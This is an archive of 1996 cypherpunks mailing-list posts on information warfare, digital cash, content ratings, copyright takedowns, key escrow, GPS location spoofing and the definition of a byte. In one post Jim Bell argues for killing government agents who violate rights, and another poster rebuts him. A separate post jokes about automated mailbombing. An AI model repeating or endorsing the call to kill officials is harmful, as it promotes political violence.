let's introduce ourselves before the hostilities begin.  I've got a
paper in mind...

	John

Excerpted from http://www.ncsa.com/iwpaper.html.  Note that this "NCSA"
is the National Computer Security Association, not the guys who wrote
"NCSA Telnet".


Fifth International Information Warfare Conference
"Dominating the Battlefields of Business and War
Sept 5-6, 1996, Washington, DC

Call for Papers

We are seeking forward thinking papers, demonstrations and interactive
concepts for presentation to an audience of 1000+ attendees;
representing civilian and military from more than 20 countries, all
branches of the US Government and the top US corporations.

The papers should offer new perspectives, attitudes, studies, and
technologies that can be used for the advancement of the field. You
are free to submit on any subject matter, including, but not limited
to:

<UL>
<LI> Battlefield Dominance
<LI> Industrial Espionage
<LI> Military Perspectives
<LI> Policy Quagmires
<LI> Personal Privacy
<LI> Denial of Service
<LI> Terrorism and Counter-Terrorism
<LI> Threats to Global Electronic Commerce
<LI> Anonymous International Bankings
<LI> The convergence of the commercial and the military in the
     Post Cold War World
<LI> InfoWar Technologies
<LI> Case Studies
<LI> Your thoughts and ideas
</UL>

Please submit your 1-2 page concept white papers NO LATER than Sunday,
May 5, 1996.  The evaluation committee will let you know the results
by Wednesday, May 15, 1996.  We will need your complete submission no
later than Monday, July 15, 1996.

Send your papers to Betty@Infowar.Com.

InfoWar Conference
&copy Copyright, 1995, NCSA &#174.</H5>




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sat, 13 Apr 1996 22:22:13 +0800
To: John Gilmore <gnu@toad.com>
Subject: Re: InfoWarCon: Call for Papers (Sept in Wash DC)
In-Reply-To: <199604130904.CAA03604@toad.com>
Message-ID: <Pine.SUN.3.91.960413071904.10486C-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 13 Apr 1996, John Gilmore wrote:

> goes.  The conference itself costs $1000 to attend, but I bet it's
> free to speakers.

According to the URL:

   Conference Fees:
$495.00 -  NCSA Members/OSS Attendees
$595.00 -  All others

Are these in error?

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 02:26:37 +0800
To: Black Unicorn <EALLENSMITH@ocelot.Rutgers.EDU>
Subject: Re: "Contempt" charges likely to increase
Message-ID: <m0u870T-0008xMC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 07:59 PM 4/12/96 -0400, Black Unicorn wrote:
>On Fri, 12 Apr 1996, E. ALLEN SMITH wrote:

>> >I might add that the Cayman Islands are full of trust companies with 
>> >provisions which forbid the disclosure of data to a client who is 
>> >coerced.  A law on the books refuses to recognize "consent" orders made 
>> >under judicial compulsion.  This would give the appearance of total 
>> >unavailability of evidence and suggest the futility of contempt 
>> >charges.  Yet courts have still, and with no small measure of success, 
>> >imposed sanctions on witnesses so protected.
>> 
>> 	What measure of success? Getting the data, or locking up the witness?
>> 	-Allen
>
>Getting the data.  If the IRS or a private plaintiff wants it bad enough, 
>they can usually get their hands on it, or at least find out where it is.
>
>The government of the United States doesn't play "fair" when they want 
>something.

But if the government of the United States does play "fair," then why can we 
not play "fair" and kill their agents who violate what we feel is our 
rights?  After all, the government is merely the representative of the 
people (at least in theory!) and it 'must' follow the rules (laws, 
Constitution, etc).  To whatever extent it exceeds those limits, and to 
whatever extent the public can't get justice to prevent those violations, 
why would the public be obligated to accept them?

To believe otherwise is to believe that the government has some sort of 
special dispensation to violate the law.  I don't believe this; it wouldn't 
surprise me to hear that you do, however.  Which is it?

Jim Bell





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 14 Apr 1996 02:47:52 +0800
To: Alan Olsen <cypherpunks@toad.com
Subject: Re: questions about bits and bytes
Message-ID: <m0u876G-0008z6C@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:51 PM 4/12/96 -0700, Alan Olsen wrote:
>At 11:34 AM 4/12/96 -0500, Doug Hughes wrote:
>>
>>On Apr 12 at 8:07
>>jim bell wrote:
>>>
>>>Are you sure they're not referring to 8 bits of data and a parity bit?  In 
>>>any case, please give the address to the list so that it can be checked out.
>>
>>Come on, give it up already and admit you were wrong. At least 8 different
>>people have cited examples of machines that supported non 8bit bytes. Your
>>pride is getting the best of you.
>
>Jim is unwilling to admit his errors, even in things he has little or no
>training in.  (I remember him claiming at one point that he was not a
>programmer or did any coding for that matter.  Why he continues to persist
>in such things I will not speculate on...)

What I meant was the most honest answer I could give:  I am not a 
professional programmer.  I have programmed, in APL, Fortran, Algol, PL/1, 
Pascal, and I can read BASIC's well enough, but not recently.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 01:01:44 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Digital Cash Escrow
In-Reply-To: <ad92e5ef110210042db1@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960413095508.10486K-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 11 Apr 1996, Timothy C. May wrote:

> At 8:27 PM 4/11/96, Vladimir Z. Nuri wrote:
> 
> >give me a break!!! the future government attempts to squelch,
> >suppress, restrict, prohibit, regulate, tax, spindle, and
> >mutilate Digital Cash will make Clipper look as significant and
> >threatening as a christmas tree ornament.
> 
> Larry, are you just _now_ realizing these implications? A few years ago you
> were fairly dismissive of these effects, arguing mainly that "electrocrisy"
> (electronic democracy?) would be the main effect, or at least the program
> that Cypherpunks should push.

[...]

> Glad you are finally tuned in to our channel.
> 
> --Tim May

I thought everyone had realized that LD was suffering from legitimate MPD 
by now?

> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
> tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Sun, 14 Apr 1996 04:15:39 +0800
To: "Andrew K. Bressen" <cypherpunks@toad.com
Subject: Re: washington post notices archives
Message-ID: <ad9521f1030210049162@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 9:39 PM 4/11/96, Andrew K. Bressen wrote:

>we here at HKS.net have today received a cease and desist
>letter from the washington post regarding editorial copy
>of theirs that was evidently posted to c'punks and then
>abosrbed into our c'punk archives.
>
>Once the archives are restored (RSN) we'll probably manually edit out
>the messages from the archive. We're trying to get the post to give us

Several relevant points for lists like ours:

1. Expect more and more of these sorts of copyright "cease and desist" (or,
as I like to say, "decease and cyst") orders, as newspapers and magazines
use search engines to find their stuff. Expect some "automated searches" to
be done routinely, even offered as services by third parties. ("Find
infringing copies...make $1000 a week in your spare time.")

2. What does removal of infringing articles mean for follow-ups? If I
reference a WSJ or NYT article that someone has quoted or forwarded, is my
follow-up expunged also?

3. And what of the "Cypherpunks Archives on CD-ROM"? Too late to simply
remove a single article...does the entire production run go into the
landfill?

(I haven't heard much about the "enthusiasm du jour" of the "Cypherpunks
CD-ROM," but this always been a concern, that legal issues would have to be
resolved, including the getting of releases from several hundred or more
parties.)

4. Suppose the HKS archives were actually offshore, in the Cayman Islands
or in some place that doesn't recognize copyright law in the same way most
Western or Berne Convention countries do?

5. Suppose access to such archives is done via Web remailers, and the
location is not easily determinable? (To be sure, lots of hits means
traffic analysis will reveal the location....the same general problem with
"reply-blocks," of course.)

It sounds like the Washington Post is discovering the brave new world.
Expect an article or two on this.

--Tim May

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 02:28:48 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: Any examples of mandatory content rating?
In-Reply-To: <ad93dffc1b021004ed13@[205.199.118.202]>
Message-ID: <Pine.SUN.3.91.960413083139.10486F@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain


On Fri, 12 Apr 1996, Timothy C. May wrote:

> 
> I'm interested in hearing about any _actual_ examples where a government
> body in the United States has mandated that intellectual property (roughly,
> written words, magazines, motion pictures, CDs, etc.) be "rated" or
> "age-labelled." Before anyone out there fires up his "Reply" and tells us
> about movie ratings, magazine warning labels, and the like, read on.

Well, my examples aren't all going to be in the United States, or 
strictly intellectual property, or 'age' based, but here:

Age rated, I don't think there are many examples.  General ratings exist. 
The best place to look for this kind of thing is e.g., FAA safety
ratings on potential aircraft/aircraft part designs.

While at first it may seem a bad example, these ratings are generally 
mandatory if you wish to market things as aircraft parts/related.  They 
are implemented in much the way I envision mandatory Internet ratings 
being implemented.  (e.g., executive Agency created to define standards and 
execute ratings system as well as enforce infractions by the removal of 
whatever largess the FAA provides.  It might also be noticed that this 
is right in line with the conflict of interest trend in government of 
allowing the same entity define and enforce standards of 
conduct/manufacture/design).  It might further be noticed that the FAA 
rating for parts increases their cost several-fold over non rated parts, 
even if non-FAA rated parts are literally identical.

> So, if anybody's still reading this, I am interested in _any_ examples
> where intellectual content (as opposed to food or drug packaging, for
> example) is required to be labelled.

Mandatory labelling or mandator rating?  I think this is an important 
distinction.  Most of the mandatory _ratings_ I can think of (FAA stuff 
included) are implemented in a round-a-bout way.  (i.e. "If you want to 
market this as X (bear a label) you must comply with Y, Z and U.")  I 
can't think of strict examples of mandatory "Labels" (i.e. "If you 
want to sell X, it must say Y, Z and U.") where a product simply must 
bear a quality rating symbol or something.  Voluntary systems are many.

The green "point" is a german example.  (Products wanting to market 
themselves as environmentally "safe" have to pass certain standards and 
then can bear the "green point" label.  This is still in the 'voluntary' 
labeling class in my view.  It might be noted, however, that if you are 
selling a food like product without the green point and you have even one 
compeditor who has it, you're not going to sell a single jar in germany).

The other German example is the Reinheitsgebot (Beer purity law, struck 
down as violating Article 30 of the ECC Treaty in Commission v. Germany, 
Case 178/84, [1987] ECR 1227).  Briefly, the word 'bier' could only be 
used on beverage products produced with only malted barley, hops, yeast 
and water.  Said the court (translated from the French)  "It must be added 
that such a system of mandatory consumer information must not entail 
negative assessment for beers not complying with the requirements of the 
Reinheitsgebot."

Laws on the mandatory use of the words "Sekt," "Weinbrand," "Branntwein 
aus Wein," and "Shaumwein" were struck down in Commission v. Germany, 
Case 12/74, [1975] ECR 181.  Taken as a whole, the German scheme could 
be viewed as a mandatory ratings system on type and quality of alcoholic 
beverages.  (The German argument for preservation of the Reinheitsgebot 
was that it prevented consumers from being taken in by producers who 
were using additives.  The Sekt, Wienbrand etc. laws were defended on 
similar grounds).  Granted all of these shy away from Mr. May's 
"intellectual property" qualification, but only insofar as we ignore 
the fact that what is really being regulated is a production process.

I suppose milk dates are "mandatory" and can be considered a "rating" in 
so far as they represent percieved quality/freshness.

Still, governments are quite talented at making ratings schemes look 
voluntary when practically speaking they are not.

> Such examples might shed some light on how these various proposals for
> "labelling" of Net traffic might work. And absent such examples, might show
> just what a tough road lies ahead for those advocating such labelling.

I think it will end up much like motion pictures.  The net will be asked 
to regulate itself under the threat of government regulation, which might 
be an empty threat if the First Amendment rights are applied.  Most 
people will comply, it being easier than making a fuss.

The real concern, if you believe as I do, that some form of internet 
rating standards are unavoidable, is allowing the same agency to make and 
enforce the standards.  IRS, SEC, FDA, FAA, FCC are all examples of where 
and how this can go wrong.  For a detailed discussion of the problems of 
government largess in the context of conflicts of interest, See Reich, The 
New Property; Reich, The New Property after 25 Years.  (Harvard Law 
Review, I forget the precise cite, but I will dig it up if anyone cares).

> --Tim May
> 
> Boycott "Big Brother Inside" software!
> We got computers, we're tapping phone lines, we know that that ain't allowed.
> ---------:---------:---------:---------:---------:---------:---------:----
> Timothy C. May              | Crypto Anarchy: encryption, digital money,
>tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
> W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
> Higher Power: 2^756839 - 1  | black markets, collapse of governments.
> "National borders aren't even speed bumps on the information superhighway."

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Sun, 14 Apr 1996 03:23:27 +0800
To: jim bell <jimbell@pacifier.com>
Subject: Re: "Contempt" charges likely to increase
In-Reply-To: <m0u870T-0008xMC@pacifier.com>
Message-ID: <Pine.SUN.3.91.960413113607.10486M-100000@polaris.mindport.net>
MIME-Version: 1.0
Content-Type: text/plain



I will not, of course, reply to Bell's reply.

On Sat, 13 Apr 1996, jim bell wrote:

> At 07:59 PM 4/12/96 -0400, Black Unicorn wrote:

> >The government of the United States doesn't play "fair" when they want 
> >something.
> 
> But if the government of the United States does play "fair," then why can we 
> not play "fair" and kill their agents who violate what we feel is our 
> rights?

Are you planning on affording them due process rights?  What about other 
rights generally?  At least the U.S. government attempts to do
this.  How about a trial, or does it merely take a single bidder with 
money to have someone offed?  Sounds like tyrrany of the rich to me.  I 
might add that if this is the way things were the richest would be the 
survivors, able to kill their enemies, protect themselves better, and 
deploy their own agents.  Jim Bell would be uni's first victim methinks.  
Sure, implement this policy, I'd love it.  I'm not sure there would be 
many people standing in the end, but the wealthy would be the last of 
them.  You're merely replacing the leaders with even more despotic types 
and without any constitutional protections.

(BTW, read it closely, I said they DON'T play fair.)

> After all, the government is merely the representative of the 
> people (at least in theory!) and it 'must' follow the rules (laws, 
> Constitution, etc).

I think the U.S. government does a much better job at this than almost 
any other sovereign excepting perhaps the U.K., which has still had its 
share of self contradiction.

> To whatever extent it exceeds those limits, and to 
> whatever extent the public can't get justice to prevent those violations, 
> why would the public be obligated to accept them?

Really Mr. Bell has recognized something important, though I'm not sure 
even he realizes it.  Specifically, that when his allies are so few in 
number he must resort to general terrorism and low intensity conflict to 
have any hope of success at all.
 
> To believe otherwise is to believe that the government has some sort of 
> special dispensation to violate the law.  I don't believe this; it wouldn't 
> surprise me to hear that you do, however.  Which is it?

I don't believe anyone has any special dispensation.  It's all a question 
of who can get away with it.  For all your moaning and whining, you are 
still less able to get away with it than agents of the CIA and the men on 
top.  It must be killing you.  I can feel the way the knife twists in you 
with the realization that you are another small gear in the machine.

You and the Unabomber.  Horrified at the thought that you might be 
insignificant.  Driven by the need to be important, noticed.

Some people work to change the system by developing structures to work 
within it, or around it.

You call for the assassination of (not even particularly important) 
public officials on the whim of the individual who happens to have cash.

You're a one trick pony and it's getting boring fast.

Grow up.

> Jim Bell  [B.A. Physics, Ph.D. Nuclear Physics, J.D., LL.M. (Taxation) 
Coast Guard Certified Navigator, Ph.D. Computer Science (Thesis on 
bytes), M.A. Political Science.]

---
My preferred and soon to be permanent e-mail address:unicorn@schloss.li
"In fact, had Bancroft not existed,       potestas scientiae in usu est
Franklin might have had to invent him."    in nihilum nil posse reverti
00B9289C28DC0E55  E16D5378B81E1C96 - Finger for Current Key Information
Opp. Counsel: For all your expert testimony needs: jimbell@pacifier.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 03:15:11 +0800
To: Jerry Whiting <jwhiting@igc.apc.org>
Subject: Re: Lotus Notes 24-bit sellout
In-Reply-To: <199604121621.JAA01379@igc2.igc.apc.org>
Message-ID: <199604131607.MAA27918@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Jerry Whiting writes:
> Definitely a deal with the Devil.  Given that we're talking about IBM, not 
> Lotus none of this surprises me given IBM's Lucifer/DES history with spook 
> input years ago.  Then again to be fair, I don't know if the 40+24 deal 
> was cooked up before or after the IBM/Lotus merger.
> 

Lucifer wasn't any stronger thatn DES. Please learn a bit about the
history of how DES was developed and what attacks it was built to
withstand. The story is all 100% public at this point.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dlv@bwalk.dm.com (Dr. Dimitri Vulis)
Date: Sun, 14 Apr 1996 05:43:26 +0800
To: cypherpunks@toad.com
Subject: Re: Answer about bits and bytes
In-Reply-To: <Pine.OSF.3.91.960413012249.6873A-100000@beall.tenet.edu>
Message-ID: <ge1BmD43w165w@bwalk.dm.com>
MIME-Version: 1.0
Content-Type: text/plain


Dan Harmon <harmon@tenet.edu> writes:
> Just a note, Jim's attribution dates seem to be older than yours. Not
> that it matters a whole hill of beans.

Nope, Jim sited a PDP-10 manual from 1971, and the first edition of _The Art of
Computer Programming_ came out in 1967. (I quoted the second edition, but I
know that the first edition had MIX too.)

The book _IBM's Early Computers_ by Bashe, Johnson, Palmer, Pugh says the
following about the STRETCH system developed in 1956 (akin to 704 and 705):
"In July, Stretch technical staff manager Buchholz wrote a report listing the
advantages of a word length of sixty-four bits. Assuming an _m-bit binary field
for addressing a sixty-four-bit memory-contained word, he noted, _m+1 bits
could address a half-word, _m+2 bits a quarter-word, _m+3 bits an eight-bit
segment, and so on until _m+6 bits could address a single bit. Using this
systematic addressing principle, one class of instructions could address words,
and other classes could address shorter operands by increasing the length of an
address field. By this time, the term "byte" had been coined as a way of
avoiding typographical confusion between bit and "bite", a term that project
personnel had been using to designate small, character-oriented word segments.
The sixty-four-bit format was adopted in September; like the previous format of
sixty bits, it was accompanied by redundant bits for use by error-detection and
-correction circuits."

They footnote: Also see W. Buchholz, January 1981: "Origin of the Word Byte",
_Annals _of _the _History _of _Computing 3, p. 72, which explains how "byte"
later came to imply eight bits.

P.S. The _Barron's Dictionary of Computer Terms_ says:

BYTE A byte is the amount of memory space needed to store one character,
which is normally 8 bits. ...

(Wondering what the cryptographic relevance of all this might possibly be...)

---

Dr. Dimitri Vulis
Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Lesher <wb8foz@nrk.com>
Date: Sun, 14 Apr 1996 04:11:29 +0800
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: No matter where you go, there they are.
Message-ID: <199604131648.MAA08425@nrk.com>
MIME-Version: 1.0
Content-Type: text


I asked a friend charged with spending money in this area.
Here's his reactions, and those of someone he consulted:


==================
..There is a business case flaw in the proposal. The scheme as laid
out only provides a high confidence factor on the users location 
(+- 10M), NOT on the actual identity of the user.  Thus it would
have to be coupled with some other form of I&A.  The business
question then arises, is the confidence delta provided by this
scheme consistent with the cost delta?  My first take is that the
answer is no.

===================
Re spoofing the system.  If you think about the geometry of the
problem, the delay to be induced for each satellite is a time
varying function of the satellite's position, the reference site,
and the target. It will vary from positive to negative values for
many satellite passes.  It can be precomputed, but the precomputed
adjustment will be in error by some amount due to the orbital
perturbations mentioned in the original article.  The most common
prediction error is the in-track postion, which inconveniently for
the predictor has the greatest effect on one's ability to calculate
the right delays.  Anyone with access to a decent orbital prediction
code and access to the statistics on orbital perturbations should be
able to calculate the expected delay prediction error as a result
of the orbital uncertainties.  If the delay prediction errors are
detectable, then it seems the system is secure after all, allthough
other reservations on operational suitability might still apply.

Note that the sensitivity is a function of the distance between the
reference site and the target.  If you could collect your reference
signal across the street from the target, it would make spoofing
a lot easier.

-- 
A host is a host from coast to coast.................wb8foz@nrk.com
& no one will talk to a host that's close........[v].(301) 56-LINUX
Unless the host (that isn't close).........................pob 1433
is busy, hung or dead....................................20915-1433




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Perry E. Metzger" <perry@piermont.com>
Date: Sun, 14 Apr 1996 06:06:44 +0800
To: Adam Shostack <adam@lighthouse.homeport.org>
Subject: Re: No matter where you go, there they are.
In-Reply-To: <199604120314.WAA05634@homeport.org>
Message-ID: <199604131757.NAA28090@jekyll.piermont.com>
MIME-Version: 1.0
Content-Type: text/plain



Adam Shostack writes:
> 	Snow Crash is a book about a future in which governments are
> ineffective.  Companies run things, and have complete local control.
> The world has gone to hell, and as a result, life is nasty, poor,
> brutish and short.  Many people do not look forward to this world.

Snow Crash is hardly scary. You have characterized it as a
story where life is nasty brutish and short but that isn't the same
book that I read. at all.

In any case, however, the future is pretty much not stoppable. There
was a time where the nobility tried to stop the crossbow, and then
firearms; there have been those who tried to stop the translation of
the bible, and to stop factories, and to stop genetic
engineering. Ideas aren't amenable to restraint. Nothing is as
inevitable as an idea who's time has come. The key to a liveable
future is learning how to adapt to the changes, not how to try to
prevent them.

Perry





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Reid <steve@edmweb.com>
Date: Sun, 14 Apr 1996 08:27:53 +0800
To: Marshall Clow <mclow@owl.csusm.edu>
Subject: Re: Protocols at the Point of a Gun
In-Reply-To: <v03005b03ad944efa70c3@[206.126.100.99]>
Message-ID: <Pine.BSF.3.91.960413133800.18548A-100000@kirk.edmweb.com>
MIME-Version: 1.0
Content-Type: text/plain


> Multiple IP #s, multiple machines, multiple users, ONE account.
> Which router will insert the "suggested" flag, and how will it decide which
> packets to tag?
> I suspect the people who thought this up haven't thought it through. :-)
> They are confusing "ISP accounts" with "e-mail" addresses, maybe?

Well, this was originally suggested by the CDA supporters, out of the 
mouth of their LAWYER. And, for sure, it's just legal posturing, saying
it's possible, but not understanding the details.

Really, the apropriate place for content filtering is at the application 
layer. It *could* be done at the transport layer, but that's really not 
the place for it.

Analogy: It would be like putting a license plate on the engine of a car. 
It *could* be done that way, if you redesign the car so that the engine
protrudes out from the back with a place for the license plate (let the
technical people handle the technical details of that). But the best place
for a license plate is on the outside body of the car, and the best place
for content filtering is at the application layer. 

All of this, of course, is Just My Humble Opinion.


=====================================================================
| Steve Reid - SysAdmin & Pres, EDM Web (http://www.edmweb.com/)    |
| Email: steve@edmweb.com   Home Page: http://www.edmweb.com/steve/ |
| PGP Fingerprint: 11 C8 9D 1C D6 72 87 E6  8C 09 EC 52 44 3F 88 30 |
|              -- Disclaimer: JMHO, YMMV, IANAL. --                 |
===================================================================:)




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Michael C. Peponis" <mianigand@[205.164.13.10]>
Date: Sun, 14 Apr 1996 05:33:22 +0800
To: "E. ALLEN SMITH" <cypherpunks@toad.com
Subject: Re: Edited Edupage, 4 April 1996
Message-ID: <199604131820.OAA28940@Fe3.rust.net>
MIME-Version: 1.0
Content-Type: text/plain


On 12 Apr 96 ,E. ALLEN SMITH wrote:

> From:	IN%"educom@elanor.oit.unc.edu"  5-APR-1996 01:25:00.85

> >IBM'S INTELLIGENT MINER DIGS OUT THE GOOD STUFF
> >IBM plans to offer companies "data mining" software and services, allowing
> >them to make better use of disparate pieces of information stored in their
> >computer systems.  The Intelligent Miner software will be available on IBM's
> >RS/6000 servers by the fall, and on other platforms by year end.  The
> >company also plans to develop Intelligent Decision Server software for local
> >area network-based information analysis.  (Investor's Business Daily 3 Apr
> >96 A9)
> 
> 	Anyone have any _specific_ ideas on how their Intelligent Miner system
> works? It would appear to be relevant to the identity-spoofing discussions.
> 	-Allen

Not really, it's a tool used in Data Warehousing/Decission Support 
Systems.

Here is what it is in a nut shell.

A company creates a Data Warehouse, defining it's data universe in 
terms of business rules and practices.

Data Mining is the process by which users try to make sence of all 
the data.

They call it "intelligent" because it supports natural language 
queries, ie the end user does not need to know SQL or the table 
layouts to retrieve the information they want.

Very sketchy explination, but there are entire volumes written on the 
subject, and it's new technology so the exact definition varies 
depending on who you ask.

I have been developing systems like this for the past year, and I 
still can't give people a cut and dry answer as to what the hell it 
is.
Regards,
Michael C. Peponis
Public Key Avalible Via Key Servers, or Finger




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: s1113645@tesla.cc.uottawa.ca
Date: Sun, 14 Apr 1996 06:17:06 +0800
To: cypherpunks@toad.com
Subject: Re: Anonymous Remailer threat: Scientologists may subpoena
In-Reply-To: <199604110423.VAA03176@infinity.c2.org>
Message-ID: <Pine.3.89.9604131410.A19543-0100000@tesla.cc.uottawa.ca>
MIME-Version: 1.0
Content-Type: text/plain




On Wed, 10 Apr 1996, sameer wrote:

> 
> 	Frankly, I'm getting antsy. Is C2 going to get subpoena'd or
> not? I would be very disappointed if we don't.
> 	(Subpeonas envy!)

All you have to do is call up CoS's lawyers. Let your fingers do the 
walking...

Seriously though, might it not be nicer (easier?) to establish some court
precedents on remailers vs. CoS rather than the government? Think of it as
a preemptive strike. The argument of CoS's religious copyright and trade
secrets don't seem to me be as emotionally effective horsemen as "National
Security Threats" or "Child Pornography". I really wouldn't want to see
Congress get away with legislating on remailers in a legal vacuum. 

Go for it Sameer. ;-) (Hope you won't be needing Jim's ISP-Aspol inc. 
insurance against them pesky scientologists...[double ;-) ])





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Olsen <alano@teleport.com>
Date: Sun, 14 Apr 1996 09:40:08 +0800
To: cypherpunks@toad.com
Subject: Re: Is crypt(1) a prohibited export?
Message-ID: <2.2.32.19960413223409.0096bcc8@mail.teleport.com>
MIME-Version: 1.0
Content-Type: text/plain


At 12:31 AM 4/10/96 -0700, Chris McAuliffe wrote:

>The man page is a bit dated:
>	crypt implements a one-rotor machine designed along the lines of the
>	German Enigma, but with a 256-element rotor.  Methods of attack on
>	such machines are known, but not widely; moreover the amount of work
>	required is likely to be large.
>
>Clearly written before CBW became popular.

What they are not telling you is the "large amount of work" is to get CBW to
*compile*, not to break crypt(1).  (Crypt Breakers Workbench uses some
obsolete calls.  I do not know of an existing updated version, but that does
not mean one does not exist...)
---
|   Remember: Life is not always champagne. Sometimes it is REAL pain.   |
|"The moral PGP Diffie taught Zimmermann unites all| Disclaimer:         |
| mankind free in one-key-steganography-privacy!"  | Ignore the man      |
|`finger -l alano@teleport.com` for PGP 2.6.2 key  | behind the keyboard.|
|         http://www.teleport.com/~alano/          | alano@teleport.com  |





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Dave Del Torto <ddt@lsd.com>
Date: Sun, 14 Apr 1996 10:29:24 +0800
To: Steve Reid <steve@edmweb.com>
Subject: Re: unsubscrive - Let's make a special list for these people!
In-Reply-To: <199604091623.JAA05150@montana.nwlink.com>
Message-ID: <v03006309ad95db747028@[192.187.167.52]>
MIME-Version: 1.0
Content-Type: text/plain


In Reply to the Message wherein it was written:
[elided]
>The idiots on the list will also try to
>send out their own "unsubscrive" messages trying to get off the special
>list, which will of course end up back in their mailboxes and in the
>mailboxes of all the other idiots.
[elided]

This is so deliciously and diabolically clever it approaches genuine
Satanism. I salute you, Sir.

And here, all I was imagining was a pro-rated (to the number of parsable
errors in the sender's attempt) automated mailbomb (min 10 identical msgs)
with full instructions at every step of the way how to avoid each and every
land-mine... I grovel in humbleness at your screen. ;)

   dave


________________________________________________________
Two cannibals are eating a clown and one asks the other:
"Hey...does this taste kinda funny to you?"






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 14 Apr 1996 10:28:58 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Any examples of mandatory content rating?
In-Reply-To: <ad93dffc1b021004ed13@[205.199.118.202]>
Message-ID: <199604132333.QAA22457@netcom11.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Klaus writes:
>I foresee major legal challenges to mandatory ratings of content. Issues
>involving prior restrain, censorship, and the First Amendment of the U.S.
>Constitution.

there is a big distinction to be made here. are posts required to
carry a rating system by which anyone can create ratings, or
are they required to carry some "official" rating from some
govt agency? for example, I think it would be odious if the government
mandated PICS for various providers, but I sure would like it a lot
more than them mandating a rating agency. that is, are they
mandating the *capability* to rate, or some "official" rating
system that involves judgement? 

>This MPAA situation is an important example because it is neither
>"self-rating" nor "government" rating, but is, instead, something else.
>This model would be extremely hard to apply to the Internet, as there is no
>similar body to the MPAA, nor is there the same economic incentive for any
>such body to form and then to try to cope with tens of thousands (at least)
>of articles and pages per day....

totally disagree with you. the existence of Surfwatch etc. proves
that there is *already* such a market and economic incentive. 
SurfWatch is in fact, in a sense, a ratings agency similar to the MPAA--
not a government body.

I foresee that the "industry" of providing ratings is going to be
a very significant aspect of future cyberspace. these ratings are
generally always going to be advisory-- people can latch onto them
for a fee if they like to determine quality. note that "good/bad"
is the most simplistic rating possible. even more superior rating
agencies might find "cool material". in fact in a sense, every
editor of every newspaper is a sort of "rating server". he culls,
filters, and selects information that the readers like.

increasingly, we are going to see systems that place economic 
incentive on *selection* more than *copyright*. in other words,
in the old system, there is a "thing" called an "article" in
